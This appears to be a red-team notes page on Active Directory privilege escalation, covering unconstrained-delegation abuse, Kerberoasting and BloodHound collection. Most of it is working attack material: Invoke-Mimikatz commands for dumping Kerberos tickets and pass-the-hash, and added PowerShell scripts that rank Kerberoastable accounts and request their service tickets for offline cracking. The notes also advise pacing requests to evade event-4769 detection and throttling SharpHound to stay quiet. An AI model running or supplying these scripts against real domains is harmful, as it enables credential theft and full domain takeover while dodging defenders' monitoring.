Powershell * POWERSHELL SECURITY

Privesc kerberos

Discover domain computers which have unconstrained delegation enabled.

Using PowerView:

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer -Unconstrained

Using the Active Directory module (the original post pasted the PowerView command a second time here; the equivalent AD-module query is a filter on the TrustedForDelegation flag, for computers and for users):

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADComputer -Filter {TrustedForDelegation -eq $true}
PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -Filter {trustedfordelegation -eq $true}

Why this matters: a host with unconstrained delegation keeps a copy of the TGT of every user who authenticates to it in LSASS, so compromising such a host (local admin is required to read LSASS) can hand over a Domain Admin TGT as soon as a DA connects. Domain controllers have the flag set by default and are not useful targets; look at the other hosts in the list. Run the following on the compromised host to check whether any DA ticket (TGT) is available, then reuse it:

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command '"sekurlsa::tickets"'
PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator…
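The enumeration above depends on PowerView or the AD module being present. The following is an added example (not code from the original post) that does the same lookup with plain LDAP through the built-in [adsisearcher] accelerator, and goes one step further than the post by excluding domain controllers, which always carry the flag. It assumes a domain-joined session running as any domain user; the function name and the output fields are my own choices.

```powershell
# Added example: find unconstrained-delegation hosts via LDAP only (no PowerView / AD module).
# Assumes a domain-joined session; any domain user can run this query.

# userAccountControl bit flags (ADS_USER_FLAG_ENUM)
$TRUSTED_FOR_DELEGATION = 0x80000   # unconstrained delegation
$SERVER_TRUST_ACCOUNT   = 0x2000    # computer account of a domain controller
$LdapBitAnd = '1.2.840.113556.1.4.803'   # LDAP_MATCHING_RULE_BIT_AND

function Get-UnconstrainedDelegationHost {
    param(
        # DCs always have unconstrained delegation; they are noise here, so skip them by default.
        [switch]$IncludeDomainControllers
    )
    $filter = "(&(objectCategory=computer)(userAccountControl:${LdapBitAnd}:=$TRUSTED_FOR_DELEGATION)"
    if (-not $IncludeDomainControllers) {
        $filter += "(!(userAccountControl:${LdapBitAnd}:=$SERVER_TRUST_ACCOUNT))"
    }
    $filter += ')'

    $searcher = [adsisearcher]$filter
    $searcher.PageSize = 1000   # paged search so large domains are not truncated at 1000 results
    [void]$searcher.PropertiesToLoad.AddRange(
        [string[]]@('name', 'dnshostname', 'operatingsystem', 'useraccountcontrol', 'lastlogontimestamp'))

    foreach ($result in $searcher.FindAll()) {
        $p = $result.Properties
        $uac = [int]$p['useraccountcontrol'][0]
        # lastLogonTimestamp is a FILETIME and may be absent on never-used accounts
        $lastLogon = $null
        if ($p.Contains('lastlogontimestamp')) {
            $lastLogon = [datetime]::FromFileTime([int64]$p['lastlogontimestamp'][0])
        }
        [pscustomobject]@{
            Name      = [string]$p['name'][0]
            DnsHost   = [string]$p['dnshostname'][0]
            OS        = [string]$p['operatingsystem'][0]
            IsDC      = [bool]($uac -band $SERVER_TRUST_ACCOUNT)
            LastLogon = $lastLogon
        }
    }
}

# Usage: the hosts listed here are the ones whose LSASS will hold the TGT of whoever
# authenticates to them; recently active ones are the candidates worth going after.
Get-UnconstrainedDelegationHost | Sort-Object LastLogon -Descending | Format-Table -AutoSize
```

The bitwise matching rule is evaluated on the DC, so the query returns only matching objects rather than every computer in the domain; pass -IncludeDomainControllers if you want to see the DCs listed as well.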

Domain Privesc

Find user accounts used as service accounts, i.e. user objects with a servicePrincipalName set (Kerberoasting targets):

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll
PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Import-Module .\ActiveDirectory.psd1
PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Get-ADUser -Filter {serviceprincipalname -ne "$null"} -Properties serviceprincipalname

Any domain user can request a service ticket (TGS) for one of those SPNs; the ticket is encrypted with the service account's password hash, so it can be cracked offline. After requesting a TGS for the target SPN, check that it has been granted and is sitting in the local ticket cache:

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> klist

Export all cached tickets using mimikatz:

PS C:\Users\victim.SECURITY\Downloads\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"kerberos::list /export"'

Crack the exported .kirbi offline with tgsrepcrack.py from https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py (only practical for RC4-encrypted tickets; AES tickets are far more expensive to brute-force):

PS C:\Users\victim.SECURITY\Downloads\kerberoast-master\kerberoast-master> python.exe .\tgsrepcrack.py .\10k-worst-passwords.txt .\2-40a50000-victim@ldap~WIN-2RUMVG5JPOC.security.local~security.local-SECURITY.LOCAL.kirbi…
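The post shows the export and cracking steps but not how the TGS gets into the cache, nor how to pick which SPNs are worth the effort. The following is an added example (not the original author's code) that enumerates SPN-bearing user accounts over LDAP, flags the ones likely to yield RC4 tickets, and requests a TGS for each through the .NET KerberosRequestorSecurityToken class, after which klist and the mimikatz export above apply. It assumes a domain-user context; the function names and the ordering heuristic are my own.

```powershell
# Added example: enumerate Kerberoastable users, prioritise them, and request their TGS.
# Assumes a domain-joined session as any domain user. Names/fields are this example's own.

Add-Type -AssemblyName System.IdentityModel

# msDS-SupportedEncryptionTypes bits
$ETYPE_RC4    = 0x4
$ETYPE_AES128 = 0x8
$ETYPE_AES256 = 0x10

function Get-KerberoastableUser {
    # User objects with an SPN, skipping krbtgt (its ticket is not crackable in practice)
    # and disabled accounts (userAccountControl bit 0x2), which the KDC will not issue tickets for.
    $filter = '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)' +
              '(!(sAMAccountName=krbtgt))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
    $s = [adsisearcher]$filter
    $s.PageSize = 1000
    [void]$s.PropertiesToLoad.AddRange(
        [string[]]@('samaccountname', 'serviceprincipalname', 'pwdlastset', 'admincount', 'msds-supportedencryptiontypes'))

    foreach ($r in $s.FindAll()) {
        $p = $r.Properties
        $etypes = 0
        if ($p.Contains('msds-supportedencryptiontypes')) { $etypes = [int]$p['msds-supportedencryptiontypes'][0] }
        $adminCount = 0
        if ($p.Contains('admincount')) { $adminCount = [int]$p['admincount'][0] }

        # An unset attribute has traditionally meant "RC4 only" for user accounts; an explicit
        # value without any AES bit means the same. Exact KDC behaviour depends on DC patch level,
        # so treat this as a prioritisation hint, not a guarantee.
        $hasAes = [bool]($etypes -band ($ETYPE_AES128 -bor $ETYPE_AES256))
        [pscustomobject]@{
            SamAccountName = [string]$p['samaccountname'][0]
            SPNs           = @($p['serviceprincipalname'] | ForEach-Object { [string]$_ })
            PwdLastSet     = [datetime]::FromFileTime([int64]$p['pwdlastset'][0])
            AdminCount     = $adminCount            # 1 = protected/privileged group member
            LikelyRC4      = -not $hasAes
        }
    }
}

function Request-ServiceTicket {
    param([Parameter(Mandatory)][string]$Spn)
    # Constructing the token performs the TGS-REQ/TGS-REP; the resulting ticket is cached
    # in this logon session and shows up in klist. GetRequest() returns the AP-REQ bytes.
    $token = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $Spn
    [void]$token.GetRequest()
    $Spn
}

# Usage: privileged accounts first, RC4 before AES, oldest passwords first (they are the
# ones most likely to be weak and to predate AES keys). One SPN per account is enough;
# every SPN on an account yields a ticket under the same key.
$targets = Get-KerberoastableUser |
    Sort-Object @{ Expression = 'AdminCount'; Descending = $true },
                @{ Expression = 'LikelyRC4';  Descending = $true },
                'PwdLastSet'
$targets | Format-Table SamAccountName, AdminCount, LikelyRC4, PwdLastSet -AutoSize
foreach ($t in $targets) { Request-ServiceTicket -Spn $t.SPNs[0] }
klist
```

Requesting a TGS for every SPN in the domain at once is the pattern detection rules look for (a burst of event ID 4769 with RC4 encryption type from one client), so in practice work down the sorted list rather than roasting everything.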

Domain Enumeration: Bloodhound

https://github.com/BloodHoundAD/BloodHound

Supply data to BloodHound by running the SharpHound ingestor on a domain-joined host:

PS C:\Users\victim.SECURITY\Downloads\BloodHound-master\BloodHound-master\Ingestors> Import-Module .\SharpHound.ps1
PS C:\Users\victim.SECURITY\Downloads\BloodHound-master\BloodHound-master\Ingestors> Invoke-BloodHound -CollectionMethod all -Verbose

Now download neo4j Community Edition from https://neo4j.com/download-center/#community, extract the archive and go to the bin folder:

PS C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9> cd .\bin\
PS C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9\bin> dir

Now, from a command prompt, install neo4j as a service and start it:

C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9\bin>neo4j.bat install-service
C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9\bin>neo4j.bat start

Now download the BloodHound-win32-x64.zip file from https://github.com/BloodHoundAD/BloodHound/releases. After extraction, double-click the BloodHound.exe file…
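-CollectionMethod all touches every computer in the domain, which is slow and noisy. The following is an added example (not from the original post) of a more deliberate collection run plus a pre-flight check that neo4j is actually up before launching the GUI. The Invoke-BloodHound parameters used here (-Loop, -LoopDuration, -LoopInterval, -Throttle, -Jitter, -ZipFileName) are assumed from the SharpHound.ps1 wrapper of that era; confirm them against Get-Help Invoke-BloodHound on the copy you have, and treat the output file names and the Test-Neo4j function as this example's own.

```powershell
# Added example: staged SharpHound collection and a neo4j readiness check.
# Assumes SharpHound.ps1 is in the current directory and neo4j was installed with
# "neo4j.bat install-service" (service name "neo4j"). Parameter names: see lead-in.

Import-Module .\SharpHound.ps1

# Stage 1: everything that can be pulled from the DC alone (users, groups, ACLs, trusts,
# GPOs, containers). Touches no member servers, so it is quick and quiet.
Invoke-BloodHound -CollectionMethod DCOnly -ZipFileName 'bh-dconly.zip' -Verbose

# Stage 2: who is logged on where. Sessions are transient, so loop for an hour polling
# every five minutes; throttle and jitter spread the per-host connections out over time.
Invoke-BloodHound -CollectionMethod 'Session,LoggedOn' `
    -Loop -LoopDuration '01:00:00' -LoopInterval '00:05:00' `
    -Throttle 500 -Jitter 30 `
    -ZipFileName 'bh-sessions.zip' -Verbose

function Test-Neo4j {
    # neo4j listens on 7474 (HTTP browser) and 7687 (Bolt, which BloodHound.exe connects to).
    # Both must be open before the GUI will authenticate; the default login is neo4j/neo4j
    # and you are forced to change it on first use.
    $svc  = Get-Service -Name 'neo4j' -ErrorAction SilentlyContinue
    $bolt = Test-NetConnection -ComputerName 'localhost' -Port 7687 -WarningAction SilentlyContinue
    $http = Test-NetConnection -ComputerName 'localhost' -Port 7474 -WarningAction SilentlyContinue
    [pscustomobject]@{
        ServiceStatus = if ($svc) { [string]$svc.Status } else { 'not installed' }
        BoltListening = $bolt.TcpTestSucceeded
        HttpListening = $http.TcpTestSucceeded
    }
}

Test-Neo4j
# Then start BloodHound.exe, log in to bolt://localhost:7687 and drag the zip files onto the window.
```

Import the DCOnly zip first; the session loop zips can be dragged in later as they are produced, and BloodHound merges the edges into the existing graph.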